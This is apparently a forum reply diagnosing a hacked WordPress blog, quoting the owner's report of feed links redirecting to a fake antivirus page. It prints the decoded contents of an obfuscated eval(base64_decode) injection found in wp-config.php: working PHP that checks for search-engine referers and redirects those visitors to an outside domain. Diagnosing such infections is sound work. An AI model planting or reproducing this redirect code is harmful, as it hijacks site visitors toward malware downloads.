Hi jon
It's got nothing to do with Reader or google as such, your wordpress
site has been hacked
if you look in the wp-config.php file you will see something like:
eval(base64_decode("CglpZiAoc3Rya .....<snip>.... Owp9Cgk="));
which decodes to:
if (stristr($_SERVER[HTTP_REFERER],"google")) {
if (!stristr($_SERVER[HTTP_REFERER],".nu") and !
stristr($_SERVER[HTTP_REFERER],"site") and !
stristr($_SERVER[HTTP_REFERER],"inurl")){
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
if (stristr($kk[1],"&")) {
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}else {
$keyword=urldecode($kk[1]);
}
header("Location:
http://fgnfdfthrv.bee.pl/?q=".$keyword);
exit();
}
}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location:
http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location:
http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
exit();
}
as you can see, the referer is checked to be one of google, yahoo or
bing, and then a call is made to
fgnfdfthrv.bee.pl, which returns a
redirect to
p3p0.com
I'm currently trying to track down how to disinfect this hack, which
led me to your post. Hope this helps,
Robin
On Feb 15, 1:45 pm, JonC wrote:
> Hi guys,
>
> I have a blog which uses Wordpress 2.9.1 (most recent version). Some
> of my readers complained that when they try to click the links in my
> feed (
http://feeds.feedburner.com/raktalicskafeed) which are
> supposed to navigate them to my webpage they arrives to the following
> website:
http://p3p0.com/?said=3333g&q=facebook,and sometimes to a
> fake antivirus page, which attempts to have them download an exe-file
> (and this site recognized as harmful site by Firefox).
>
> This issue only occurs in readers which are made by Google (iGoogle,
> Google Reader). I tried this in Opera's built-in RSS-browser, and in
> NewsCrawler too, but I didn't experienced any problems.
>
> I suppose that there's something wrong with Reader (and iGoogle),
> because when I click on a link in other feedreader it works in the
> correct way. Btw if I add my original feed (
http://raktalicska.hu/feed